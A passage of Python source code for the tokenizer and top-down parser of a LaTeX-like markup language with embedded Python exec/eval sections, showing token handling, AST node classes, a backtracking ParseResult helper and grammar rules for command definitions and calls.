self._current_char in END_LINE_CHARS: while self._current_char in END_LINE_CHARS: # Do nothing, just eat the END_LINE_CHARS now that we know that there is a PARAGRAPH_BREAK self._advance() t = Token(TT.PARAGRAPH_BREAK, TT.PARAGRAPH_BREAK, pos_start, self._pos.copy()) elif cc in NON_END_LINE_CHARS: self._try_word_token() self._advance() elif cc == '{': if self._unpaired_cbrackets == 0: self._first_unpaired_bracket_pos = self._pos.copy() self._unpaired_cbrackets += 1 t = Token(TT.OCBRACE, '{', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '}': self._unpaired_cbrackets -= 1 if self._unpaired_cbrackets < 0: raise InvalidSyntaxError(self._pos.copy(), self._pos.copy().advance(), 'Unpaired, unescaped, closing curly bracket "}". 
You need to add an open curly bracket "{" before it or escape it by putting a backslash before it.') t = Token(TT.CCBRACE, '}', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '=': t = Token(TT.EQUAL_SIGN, '=', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '(': if self._unpaired_oparens == 0: self._first_unpaired_oparens_pos = self._pos.copy() self._unpaired_oparens += 1 t = Token(TT.OPAREN, '(', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == ')': self._unpaired_oparens -= 1 if self._unpaired_oparens < 0: raise InvalidSyntaxError(self._pos.copy(), self._pos.copy().advance(), 'Unpaired, unescaped, closing parenthesis ")". You need to add an open curly bracket "(" before it or escape it by putting a backslash before it.') t = Token(TT.CPAREN, ')', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == ',': t = Token(TT.COMMA, ',', self._pos.copy(), space_before=self._previous_char) self._advance() elif cc == '\\': t = self._tokenize_cntrl_seq() else: self._plain_text_char() if t is not None: # Actually append the Token (or list of tokens) if there is a Token to append self._try_word_token() if isinstance(t, Token): self._tokens.append(t) else: # t must be a list of tokens self._tokens.extend(t) if print_progress and not full_bar_printed: print_progress_bar(text_len, text_len, prefix) if self._unpaired_cbrackets > 0: raise InvalidSyntaxError(self._first_unpaired_bracket_pos.copy(), self._first_unpaired_bracket_pos.copy().advance(), f'{self._unpaired_cbrackets} unpaired, unescaped, opening curly bracket(s) "{" starting from this opening curly bracket. Either escape each one by putting a backslash before them or pair them with a closing curly bracket "}".') if self._unpaired_oparens > 0: raise InvalidSyntaxError(self._first_unpaired_oparens_pos.copy(), self._first_unpaired_oparens_pos.copy().advance(), f'{self._unpaired_oparens} unpaired, unescaped, opening parenthes(es) "(" starting from this open parenthes(es). Either escape each one by putting a backslash before them or pair them with a closing parenthesis ")".') self._try_word_token() if file: self._tokens.append(Token(TT.FILE_END, '<FILE END>', self._pos.copy())) return self._tokens # ------------------------------------------------------------------------- # Parsing Methods def _tokenize_cntrl_seq(self): """ Parse a control sequence. 
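
        A control sequence is anything introduced by an unescaped backslash.
        Depending on what follows, this dispatches (roughly in this order,
        longer openers first so that a short opener cannot shadow a longer
        one) to: a multi-line Python section, a one-line Python section, a
        multi-line or single-line comment, or a command identifier such as
        \\bold (see _tokenize_identifier).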
""" t = None pos_start = self._pos.copy() # NOTE: Multi-line matches tend be longer and so need to come before # single-line matches because shorter matches will match before longer # matches, even if the longer match would have worked had it been tried # Multiple Line Python ---------------------- if self._match(TT_M.MULTI_LINE_PYTH_1PASS_EXEC_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_1PASS_EXEC_END, 1, pos_start) elif self._match(TT_M.MULTI_LINE_PYTH_1PASS_EVAL_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_1PASS_EVAL_END, 1, pos_start, use_eval=True) elif self._match(TT_M.MULTI_LINE_PYTH_2PASS_EXEC_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_2PASS_EXEC_END, 2, pos_start) elif self._match(TT_M.MULTI_LINE_PYTH_2PASS_EVAL_START): t = self._tokenize_python(TT_M.MULTI_LINE_PYTH_2PASS_EVAL_END, 2, pos_start, use_eval=True) # One Line Python ----------------------- elif self._match(TT_M.ONE_LINE_PYTH_1PASS_EXEC_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_1PASS_EXEC_END, 1, pos_start, one_line=True) elif self._match(TT_M.ONE_LINE_PYTH_1PASS_EVAL_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_1PASS_EVAL_END, 1, pos_start, one_line=True, use_eval=True) elif self._match(TT_M.ONE_LINE_PYTH_2PASS_EXEC_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_2PASS_EXEC_END, 2, pos_start, one_line=True) elif self._match(TT_M.ONE_LINE_PYTH_2PASS_EVAL_START): t = self._tokenize_python(TT_M.ONE_LINE_PYTH_2PASS_EVAL_END, 2, pos_start, one_line=True, use_eval=True) # Comment ---------------------- elif self._match(TT_M.MULTI_LINE_COMMENT_START): t = self._tokenize_comment(pos_start, one_line=False) elif self._match(TT_M.SINGLE_LINE_COMMENT_START): t = self._tokenize_comment(pos_start, one_line=True) # Command -------------------------- else: # It is an identifier, so tokenize it t = self._tokenize_identifier() return t def _tokenize_python(self, end_codes, pass_num, pos_start, one_line=False, use_eval=False): """ Parses the string from self._pos as python code until one of the end_codes are reached. If one_line is true, that means that this python statement is supposed to only be one line so it cannot turn the rest of the file into python. """ python_str = '' pos_end = self._pos.copy() match_found = False while self._current_char is not None: if self._match(end_codes, False): # Only eat the chars if they are not in the END_LINE_CHARS. # Otherwise it is needed in order to determine whether to put # in a PARAGRAPH_BREAK if not self._current_char in END_LINE_CHARS: self._match(end_codes) match_found = True break else: # Since python has not ended yet, just add the given char to it python_str += self._current_char self._advance() if (self._current_char is None) and (not match_found) and (not one_line): raise InvalidSyntaxError(pos_start, pos_end, f'You made the rest of your file Python because there was no matching character sequence to end the Python section of your document denoted by this character sequence.') pos_end = self._pos.copy() if pass_num == 1: if use_eval: return Token(TT.EVAL_PYTH1, python_str, pos_start, pos_end) else: return Token(TT.EXEC_PYTH1, python_str, pos_start, pos_end) else: if use_eval: return Token(TT.EVAL_PYTH2, python_str, pos_start, pos_end) else: return Token(TT.EXEC_PYTH2, python_str, pos_start, pos_end) def _tokenize_comment(self, pos_start, one_line=False): """ Parses a comment, basically just eating any characters it finds until the comment is done. 
None of the characters are put into any Token, so the Parser will never even see them. """ pos_end = self._pos.copy() if one_line: # Its a one_line comment while self._current_char is not None: if self._match(TT_M.SINGLE_LINE_COMMENT_END): break else: self._advance() else: found_match = False # it's a continous comment, so parse until '<-%\' or '<-#\' is found while self._current_char is not None: if self._match(TT_M.MULTI_LINE_COMMENT_END): found_match = True break else: self._advance() if self._current_char is None and not found_match: raise InvalidSyntaxError(pos_start, pos_end, 'You commented out the rest of your file because there was no matching "<-%\\" or "<-#\\" to end the comment.') if len(self._tokens) > 0 and self._tokens[-1].type == TT.PARAGRAPH_BREAK: # Need to eat all end line white space now so that another # PARAGRAPH_BREAK cannot be produced due to this comment text being # ignored and there being white space before it. Two PARAGRAPH_BREAKs # next to eachother breaks all grammar rules and causes the Parser # to terminate early (i.e. before it reaches the FILE_END token) while self._current_char in END_LINE_CHARS: self._advance() def _tokenize_identifier(self): """ Tokenize an identifier like \\bold or \\i """ identifier_name = '' start_pos = self._pos.copy() space_before = self._previous_char #tokens = [] #tokens.append(Token(TT.BACKSLASH, '\\', start_pos.copy(), self._pos.copy(), space_before=space_before)) self._advance() # advance past '\\' problem_start = self._pos.copy() while self._current_char is not None: if self._current_char in CMND_CHARS: identifier_name += self._current_char self._advance() else: if len(identifier_name) == 0: raise ExpectedValidCmndNameError(problem_start, self._pos.copy(), f'All commands must specify a valid name with all characters of it in {CMND_CHARS}\n"{self._current_char}" is not one of the valid characters. You either forgot to designate a valid command name or forgot to escape the backslash before this character.') token = Token(TT.IDENTIFIER, identifier_name, start_pos.copy(), self._pos.copy(), space_before=space_before) return token # ------------------------------------------------------------------------- # Other Helper Methods def _try_word_token(self): """ Create a WORD token given what is in self._plain_text """ self._plain_text = re.sub('(\s)+', '', self._plain_text) if len(self._plain_text) > 0: self._tokens.append(Token(TT.WORD, self._plain_text, self._plain_text_start_pos, self._pos.copy(), space_before=self._space_before_plaintext)) self._space_before_plaintext = False self._plain_text = '' self._plain_text_start_pos = None def _plain_text_char(self): """ The current_char is a plain_text character """ if self._plain_text_start_pos is None: self._plain_text_start_pos = self._pos.copy() if self._pos.idx - 1 >= 0: self._space_before_plaintext = (self._text[self._pos.idx - 1] in WHITE_SPACE_CHARS) else: self._space_before_plaintext = False self._plain_text += self._current_char self._advance() def _match(self, matches:list, advance_past_on_match=True): """ Takes the given list of strings to match and sees if any of them match the text at the current index of the self._text This method does not look forward in the text for a match, just returns True if the string starting at the current index matches any of the matches. If advance_past_on_match, then if this method matches something, it will advance past the string it matched. 
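
        For example (illustrative of the call shape only), something like

            if self._match(TT_M.MULTI_LINE_COMMENT_END, False):
                ...

        asks whether one of the comment-terminating strings starts at the
        current character without consuming it, while the default
        advance_past_on_match=True form also eats the matched string.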
""" index = self._pos.idx for str_to_match in matches: if ((index + len(str_to_match)) < len(self._text)) \ and (str_to_match == self._text[index:index + len(str_to_match)]): if advance_past_on_match: self._advance(len(str_to_match)) return True return False # ----------------------------------------------------------------------------- # Nodes for Parser DUMMY_POSITION = Position(0, 0, 0, 'Dummy File Name', 'Dummy File Text') class LeafNode: """ Base class for all Leaf Nodes (nodes that can only have one token) """ __slots__ = ['start_pos', 'end_pos'] def __init__(self, token): """ Takes a token and sets the start and end positions using it. Still must name the token in the actual node (i.e. self.writing, etc.) """ self.start_pos = token.start_pos self.end_pos = token.end_pos class FileNode: __slots__ = ['start_pos', 'end_pos', 'file_start', 'document', 'file_end'] def __init__(self, file_start, document, file_end): self.file_start = file_start # Token self.document = document # DocumentNode self.file_end = file_end # Token self.start_pos = file_start.start_pos self.end_pos = file_end.end_pos def __repr__(self): return f'{self.__class__.__name__}({self.file_start}, {self.document}, {self.file_end})' class DocumentNode: __slots__ = ['start_pos', 'end_pos', 'starting_paragraph_break', 'paragraphs', 'ending_paragraph_break'] def __init__(self, paragraphs, starting_paragraph_break=None, ending_paragraph_break=None): self.starting_paragraph_break = starting_paragraph_break # Token self.paragraphs = paragraphs # List of ParagraphNodes self.ending_paragraph_break = ending_paragraph_break # Token if starting_paragraph_break: self.start_pos = starting_paragraph_break.start_pos elif len(paragraphs) > 0: self.start_pos = paragraphs[0].start_pos else: self.start_pos = DUMMY_POSITION.copy() if len(paragraphs) > 0: self.end_pos = paragraphs[-1].end_pos elif ending_paragraph_break: self.end_pos = ending_paragraph_break.end_pos elif starting_paragraph_break: self.end_pos = starting_paragraph_break.end_pos else: self.end_pos = DUMMY_POSITION.copy() def __repr__(self): return f'{self.__class__.__name__}({self.paragraphs})' class ParagraphNode: __slots__ = ['start_pos', 'end_pos', 'writing', 'paragraph_break'] def __init__(self, paragraph_break, writing): self.paragraph_break = paragraph_break # Token self.writing = writing # WritingNode self.start_pos = writing.start_pos if paragraph_break: self.end_pos = paragraph_break.end_pos else: self.end_pos = writing.end_pos def __repr__(self): return f'{self.__class__.__name__}({self.writing})' class WritingNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['writing']) def __init__(self, writing): """ writing can be either a python node or a plain_text node. 
""" super().__init__(writing) self.writing = writing # PythonNode or PlainTextNode def __repr__(self): return f'{self.__class__.__name__}({self.writing})' class PythonNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['python', 'python_string']) def __init__(self, python): """ python is a single python Token (PASS1EXEC|PASS2EXEC|PASS1EVAL|PASS2EVAL) """ super().__init__(python) self.python = python # one of the exec or eval Nodes self.python_string = None def __repr__(self): return f'{self.__class__.__name__}({self.python})' class CommandDefNode: __slots__ = ['start_pos', 'end_pos', 'cmnd_name', 'cmnd_params', 'cmnd_key_params', 'text_group'] def __init__(self, cmnd_name, cmnd_params, cmnd_key_params, text_group): self.start_pos = cmnd_name.start_pos self.end_pos = text_group.end_pos self.cmnd_name = cmnd_name # IDENTIFIER Token self.cmnd_params = cmnd_params # list of CommandParamNodes self.cmnd_key_params = cmnd_key_params # list of CommandKeyParamNodes self.text_group = text_group # the text_group that the command will run def __repr__(self): cmnd_args = '' for i, arg in enumerate(self.cmnd_params): if i > 0: cmnd_args += ', ' cmnd_args += f'{arg}' return f'{self.__class__.__name__}({self.cmnd_name} = ({cmnd_args}) ' + '{' + f'{self.text_group}' + '}' + ')' class CommandParamNode: __slots__ = ['start_pos', 'end_pos', 'identifier'] def __init__(self, identifier): self.start_pos = identifier.start_pos self.end_pos = identifier.end_pos self.identifier = identifier # IDENTIFIER Token def __repr__(self): return f'{self.__class__.__name__}({self.identifier})' class CommandKeyParamNode: __slots__ = ['start_pos', 'end_pos', 'key', 'text_group'] def __init__(self, key, text_group): self.start_pos = key.start_pos self.end_pos = text_group.end_pos self.key = key # WORD Token self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.text_group})' class CommandCallNode: __slots__ = ['start_pos', 'end_pos', 'cmnd_name', 'cmnd_tex_args', 'cmnd_key_args'] def __init__(self, cmnd_name, cmnd_tex_args, cmnd_key_args): self.start_pos = cmnd_name.start_pos self.end_pos = cmnd_name.end_pos self.cmnd_name = cmnd_name # IDENTIFIER Token self.cmnd_tex_args = cmnd_tex_args # list of CommandTexArgNode self.cmnd_key_args = cmnd_key_args # dict of keyword:CommandArgNode pairs def __repr__(self): string = f'{self.__class__.__name__}(\\{self.cmnd_name}' # add args for arg in self.cmnd_tex_args: string += '{' + f'{arg}' + '}' # add kwargs for kwarg in self.cmnd_key_args: string += '{' + f'{kwarg.key}={kwarg.text_group}' + '}' # end string string += ')' return string class CommandTexArgNode: __slots__ = ['start_pos', 'end_pos', 'text_group'] def __init__(self, text_group): self.start_pos = text_group.start_pos self.end_pos = text_group.end_pos self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.text_group})' class CommandKeyArgNode: __slots__ = ['start_pos', 'end_pos', 'key', 'text_group'] def __init__(self, key, text_group): self.start_pos = key.start_pos self.end_pos = text_group.end_pos self.key = key # IDENTIFIER Token self.text_group = text_group # TextGroupNode def __repr__(self): return f'{self.__class__.__name__}({self.key}={self.text_group})' class TextGroupNode: __slots__ = ['start_pos', 'end_pos', 'ocbrace', 'document', 'ccbrace'] def __init__(self, ocbrace, document, ccbrace): self.start_pos = ocbrace.start_pos self.end_pos = ccbrace.end_pos self.ocbrace = ocbrace self.document = document 
self.ccbrace = ccbrace def __repr__(self): return f'{self.__class__.__name__}({self.document})' class PlainTextNode(LeafNode): __slots__ = LeafNode.__slots__[:] __slots__.extend(['plain_text']) def __init__(self, plain_text:list): """ plain_text is a list of OCBRACE, CCBRACE, EQUAL_SIGN, and WORD Tokens in any order. """ self.plain_text = plain_text # list of Tokens if len(plain_text) > 0: self.start_pos = plain_text[0].start_pos self.end_pos = plain_text[-1].end_pos else: self.start_pos = DUMMY_POSITION.copy() self.end_pos = DUMMY_POSITION.copy() def __repr__(self): return f'{self.__class__.__name__}({self.plain_text})' # ----------------------------------------------------------------------------- # Parser Class and Related class ParseResult: """ A class that wraps results from the Parser because the parser will be trying out different things (is the next token plain text or a paragraph break? neither? then whats the next thing it could be?) and this ParseResult allows the Parser to try something and then undo that thing. An error can also can be returned if none of the things that were supposed to work actually work. """ __slots__ = ['error', 'node', 'last_registered_advance_count', 'advance_count', 'to_reverse_count', 'affinity'] def __init__(self): self.error = None self.node = None self.last_registered_advance_count = 0 self.advance_count = 0 self.to_reverse_count = 0 self.affinity = 0 def register_advancement(self): """ Registers that the Parser advanced a token so that that advancement can be undone later if need be. """ self.last_registered_advance_count = 1 self.advance_count += 1 def register(self, res): """ Registers a result, adding the error to this result if there was one and returning the node. """ self.last_registered_advance_count = res.advance_count self.advance_count += res.advance_count self.affinity += res.affinity if res.error: self.error = res.error return res.node def register_try(self, res): """ Returns None if the given result did not work and the Node of the result if it did. """ if res.error: self.affinity += res.affinity self.to_reverse_count = res.advance_count return None return self.register(res) def reversing(self): """ The last try is being reverse so set the to_reverse_count back to 0 and return what it was so that it can be reversed. """ to_reverse = self.to_reverse_count self.to_reverse_count = 0 return to_reverse def add_affinity(self, amt=1): """ Affinity is how far along the result was getting before it ran into an error. This is useful for when there are multiple possibilities as to where the errors my be coming from such as in the writing rule of this language's grammar. This affinity can be used to see whether any of the rules applied or not because if non of them did, then the parser is probably just at the end of the file. """ self.affinity += amt def success(self, node): self.node = node return self def failure(self, error): if not self.error or self.last_registered_advance_count == 0: self.error = error return self class Parser: """ Creates an Abstract Syntax Tree based on the rules in grammar.txt. Look at grammar.txt for the outline of what the Parser is trying to do. It takes each rule and recursively tries to make it work. When a rule does not work, it returns a ParseResult with an error in ParseResult.error. In the case of the error, the index is changed back to what it was before the Parser tried the rule. If there was no error, then the Node that was successfully created by the rule is returned. 
This Parser uses a top-down approach to parsing, as opposed to a bottom-up approach to parsing, which is a far harder method of parsing to write a Parser for. """ def __init__(self, tokens, print_progress_bar=False): # Progress Printing Info self._print_progress_bar = print_progress_bar self._tokens_len = len(tokens) file_path = '' if self._tokens_len == 0 else tokens[0].start_pos.file_path self._progress_bar_prefix = prog_bar_prefix('Parsing', file_path) self._prog_bar_refresh = calc_prog_bar_refresh_rate(self._tokens_len) # Things needed to actually parse the tokens self._tokens = tokens self._tok_idx = -1 self._current_tok = None self._advance() def parse(self): """ Returns a ParseResult with either an error in res.error or a node in res.node """ if self._print_progress_bar: print_progress_bar(self._tok_idx, self._tokens_len, self._progress_bar_prefix) if self._current_tok.type == TT.FILE_START: res = self._file() else: res = self._document() if self._print_progress_bar: print_progress_bar(self._tok_idx, self._tokens_len, self._progress_bar_prefix) return res # ------------------------------ # Main Helper Methods def _advance(self, parse_result=None): """ Advances to the next token. It returns the token before the new one and registers an advancement with the given parse_result for convenience. """ prev_token = self._current_tok if parse_result: parse_result.register_advancement() self._tok_idx += 1 self._update_current_tok() return prev_token def _reverse(self, parse_result): self._tok_idx -= parse_result.reversing() self._update_current_tok() def _update_current_tok(self): if self._tok_idx >= 0 and self._tok_idx < len(self._tokens): self._current_tok = self._tokens[self._tok_idx] else: # TT.NONE_LEFT will NOT match any Tokens needed for any rule, # forcing an error to occur in each rule and the rules to # terminate. This is much safer than just not changing the token # any more when you run out of tokens to parse because now, even if # you have a low-level rule that will accept infinitely many of a # token of a certain type, that type will not be infinitely given # if the list of tokens ends on it if self._current_tok is not None: self._current_tok = Token(TT.NONE_LEFT, 'NO TOKENS LEFT', self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy()) else: dummy_start_pos = DUMMY_POSITION.copy() dummy_end_pos = dummy_start_pos.copy() self._current_tok = Token(TT.NONE_LEFT, 'NO TOKENS LEFT', dummy_start_pos, dummy_end_pos) # ------------------------------ # Rules def _file(self): """ A document but with a FILE_START token at the beginning and a FILE_END token at the end. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() if self._current_tok.type == TT.FILE_START: file_start = self._advance(res) else: return res.failure(InvalidSyntaxError(start_pos, start_pos.copy().advance(), 'For some reason, your file does not begin with a FILE_START Token. This is a Compiler Error, so contact the developer and let them know.')) document = res.register(self._document()) if res.error: return res if self._current_tok.type == TT.FILE_END: file_end = self._advance(res) else: return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), f'Reached the end of the file but there was no FILE_END Token. 
The file must have Invalid Syntax or the compiler is having issues.\nALL TOKENS: {self._tokens}\n\nLAST TOKEN SEEN: {self._current_tok}\n\nLast Token Seen Index: {self._tok_idx}')) return res.success(FileNode(file_start, document, file_end)) def _document(self): """ A document is a group of paragraphs, essentially. """ res = ParseResult() paragraphs = [] # will eat token if there, otherwise nothing self._eat_pb(res) print_prog_bar = self._print_progress_bar if print_prog_bar: refresh = self._prog_bar_refresh toks_len = self._tokens_len prefix = self._progress_bar_prefix while True: # paragraph will be None if the try failed, otherwise it will be the # new ParagraphNode result = self._paragraph() if result.error and result.affinity > 0: res.register(result) return res paragraph = res.register_try(result) # If, when we tried to make another paragraph, it failed, # that means that there are no more paragraphs left in the # document, so undo the try by going back the number of # tokens that the try went forward if not paragraph: self._reverse(res) break else: if print_prog_bar: i = self._tok_idx if (i % refresh) == 0: print_progress_bar(i, toks_len, prefix) paragraphs.append(paragraph) self._eat_pb(res) return res.success(DocumentNode(paragraphs)) def _paragraph(self): """ A peice of writing, with a paragraph break before it possibly. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() # Check for Paragraph Break paragraph_break = self._eat_pb(res) # Check for Writing writing = res.register(self._writing()) if res.error: return res # writing should be a WritingNode and paragraph_break is a Token of # type PARAGRAPH_BREAK return res.success(ParagraphNode(paragraph_break, writing)) def _writing(self): """ A peice of writing such as something to run in python, a command def or command call, text group, or pain text. """ res = ParseResult() start_pos = self._current_tok.start_pos.copy() results = [] new_res = self._python() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._cmnd_def() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._cmnd_call() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._plain_text() results.append(new_res) writing = res.register_try(new_res) if not writing: self._reverse(res) new_res = self._text_group() results.append(new_res) writing = res.register_try(new_res) if not writing: best_result = None for result in results: if result.affinity > 0 and ((not best_result) or result.affinity > best_result.affinity): best_result = result if not best_result: return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'There was no writing, but writing was expected.' )) else: return res.failure(best_result) # writing should be either a PythonNode or a PlainTextNode return res.success(WritingNode(writing)) def _python(self): """ This fulfills the python rule of the grammar. 
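
        It accepts exactly one Token whose type is EXEC_PYTH1, EVAL_PYTH1,
        EXEC_PYTH2 or EVAL_PYTH2 and wraps it in a PythonNode; any other
        token type makes this rule fail so that the writing rule can try its
        other alternatives.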
""" res = ParseResult() ct = self._current_tok type = self._current_tok.type # Python Switch Statement to figure out whether the token is a Python Token try: python = { TT.EXEC_PYTH1: ct, TT.EVAL_PYTH1: ct, TT.EXEC_PYTH2: ct, TT.EVAL_PYTH2: ct }[ct.type] except KeyError: return res.failure(InvalidSyntaxError(ct.start_pos.copy(), ct.start_pos.copy().advance(), 'Expected a Token of Type PASS1EXEC, PASS1EVAL, PASS2EXEC, or PASS1EVAL but did not get one.') ) self._advance(res) # python should be a single python Token of type PASS1EXEC or PASS2EXEC # or PASS1EVAL or PASS2EVAL return res.success(PythonNode(python)) def _cmnd_def(self): """ A command definition. For example: \\hi = (\\first_name, \\last_name={}) { Hello \\first_name \\last_name } """ res = ParseResult() cmnd_name = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) equal_sign = res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) cmnd_params = [] # (OPAREN PB? (cmnd_params PB? (COMMA PB? cmnd_params)*)? PB? CPAREN)? oparen = res.register_try(self._need_token(TT.OPAREN)) if oparen: res.add_affinity() self._eat_pb(res) cmnd_param = res.register_try(self._cmnd_param()) if not cmnd_param: self._reverse(res) else: res.add_affinity() cmnd_params.append(cmnd_param) while True: self._eat_pb(res) comma = res.register_try(self._need_token(TT.COMMA)) if not comma: self._reverse(res) break res.add_affinity() cmnd_param = res.register(self._cmnd_param()) if res.error: return res.failure(InvalidSyntaxError( comma.start_pos.copy(), comma.end_pos.copy(), 'Extra comma. You need to either have a variable name after it or remove it.' )) res.add_affinity() cmnd_params.append(cmnd_param) self._eat_pb(res) cparen = res.register(self._need_token(TT.CPAREN)) if res.error: return res.failure(InvalidSyntaxError( oparen.start_pos, oparen.end_pos, 'You need to have a matching closing parenthesis ")" to match this parenthisis after your parameters for the Command Definition.' )) res.add_affinity() self._eat_pb(res) # text_group text_group = res.register(self._text_group()) if res.error: return res.failure(InvalidSyntaxError( self._current_tok.start_pos, self._current_tok.end_pos, 'Here, you need to have a pair of curly brackets "{}", at the very least, in order to finish off this command definition.' )) res.add_affinity() cmnd_tex_params = [] cmnd_key_params = [] for param in cmnd_params: if isinstance(param, CommandParamNode): cmnd_tex_params.append(param) elif isinstance(param, CommandKeyParamNode): cmnd_key_params.append(param) else: raise Exception(f'This was outputted as a command parameter but is not one: {param}') return res.success(CommandDefNode(cmnd_name, cmnd_tex_params, cmnd_key_params, text_group)) def _cmnd_param(self): """ A command Parameter. 
So either \\hi = {a default value} or \\hi """ res = ParseResult() self._eat_pb(res) text_group = res.register_try(self._cmnd_key_param()) if text_group: return res.success(text_group) self._reverse(res) text_group = res.register_try(self._cmnd_tex_param()) if text_group: return res.success(text_group) else: self._reverse(res) return res.failure(InvalidSyntaxError(self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'Expected a Command Parameter here.')) def _cmnd_key_param(self): """ A command parameter so \\hi = {a default value} """ res = ParseResult() self._eat_pb(res) key = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() return res.success(CommandKeyParamNode(key, text_group)) def _cmnd_tex_param(self): """ A command parameter that is just an IDENTIFIER """ res = ParseResult() ident = res.register(self._need_token(TT.IDENTIFIER)) res.add_affinity() if not ident: return res else: return res.success(CommandParamNode(ident)) def _cmnd_call(self): """ A command call like \\hi or \\hi{FirstName}{\\last_name={LastName}} """ res = ParseResult() cmnd_name = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() args = [] while True: arg = res.register_try(self._cmnd_arg()) if not arg: self._reverse(res) break res.add_affinity() args.append(arg) cmnd_tex_args = [] cmnd_key_args = [] for arg in args: if isinstance(arg, CommandTexArgNode): cmnd_tex_args.append(arg) elif isinstance(arg, CommandKeyArgNode): cmnd_key_args.append(arg) else: raise Exception(f'Expected a command argument Node, instead got: {arg}') return res.success(CommandCallNode(cmnd_name, cmnd_tex_args, cmnd_key_args)) def _cmnd_arg(self): """ A cmnd argument such as {FirstName} or {\\first_name={FirstName}} in \\hi{FirstName}{\\first_name={FirstName}} """ res = ParseResult() arg = res.register_try(self._cmnd_key_arg()) if arg: return res.success(arg) self._reverse(res) arg = res.register_try(self._cmnd_tex_arg()) if arg: return res.success(arg) self._reverse(res) return res.failure(InvalidSyntaxError( self._current_tok.start_pos.copy(), self._current_tok.end_pos.copy(), 'Expected a Command Argument here.' 
)) def _cmnd_tex_arg(self): """ A command text argument \\he{FirstName} """ res = ParseResult() text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() return res.success(CommandTexArgNode(text_group)) def _cmnd_key_arg(self): """ A command key argument such as {\\first_name={FirstName}} in \\he{\\first_name={FirstName}} """ res = ParseResult() res.register(self._need_token(TT.OCBRACE)) if res.error: return res res.add_affinity() ident = res.register(self._need_token(TT.IDENTIFIER)) if res.error: return res res.add_affinity() self._eat_pb(res) res.register(self._need_token(TT.EQUAL_SIGN)) if res.error: return res res.add_affinity() self._eat_pb(res) text_group = res.register(self._text_group()) if res.error: return res res.add_affinity() res.register(self._need_token(TT.CCBRACE)) if res.error: return res res.add_affinity() return res.success(CommandKeyArgNode(ident, text_group)) def _text_group(self): """ A text group is { document } """ res = ParseResult() ocb = res.register(self._need_token(TT.OCBRACE)) if res.error: return res res.add_affinity() document = res.register(self._document()) if res.error: return res res.add_affinity() ccb = res.register(self._need_token(TT.CCBRACE)) if res.error: return res res.add_affinity() return res.success(TextGroupNode(ocb, document, ccb)) def _plain_text(self): res = ParseResult() plain_text = [] while True: cc = self._current_tok start_pos = cc.start_pos # Python Switch Statement try: new_tok = { TT.BACKSLASH: cc, TT.EQUAL_SIGN: cc, TT.COMMA: cc, TT.OPAREN: cc, TT.CPAREN: cc, TT.OBRACE: cc, TT.CBRACE: cc, TT.WORD: cc }[cc.type] # If I remember correctly, you cannot directly wrap the dict # in this append method because it appends the error # to the list when there is an error, which is problematic plain_text.append(new_tok) res.add_affinity() except KeyError: break self._advance(res) if len(plain_text) == 0: return res.failure(InvalidSyntaxError(start_pos.copy(), start_pos.copy().advance(), 'Expected atleast 1 WORD, BACKSLASH, OCBRACE, CCBRACE, or EQUAL_SIGN Token.' ) ) # plain_text is a list of OCBRACE, CCBRACE, EQUAL_SIGN, and WORD Tokens # in any order. return res.success(PlainTextNode(plain_text)) # ------------------------------------------------------------------------- # Non-Rule Lesser Help Methods def _eat_pb(self, parse_result): """ Eat a PARAGRAPH_BREAK A helper method that, unlike the other methods, just exists because there are many rules with PARAGRAPH_BREAK? in them. This method does that, returning None if the current token is not a PARAGRAPH_BREAK and the PARAGRAPH_BREAK Token if there is one. If a PARAGRAPH_BREAK token is found, the method also advances past past it. """ par_break = None if self._current_tok.type == TT.PARAGRAPH_BREAK: par_break = self._advance(parse_result) return par_break def _need_token(self, token_type): """ A helper method that just checks that a token exists right now. Will return a ParseResult with an error if the token is not the required one and a ParseResult with the node of the result being the token if the current token is the correct one. This method exists not because there is a Node for it (there is not one) but because what this method does is something that needs to be done a lot in the parse methods. 
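
        Typical use inside a rule method (this mirrors how the existing
        rules call it):

            cmnd_name = res.register(self._need_token(TT.IDENTIFIER))
            if res.error: return res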
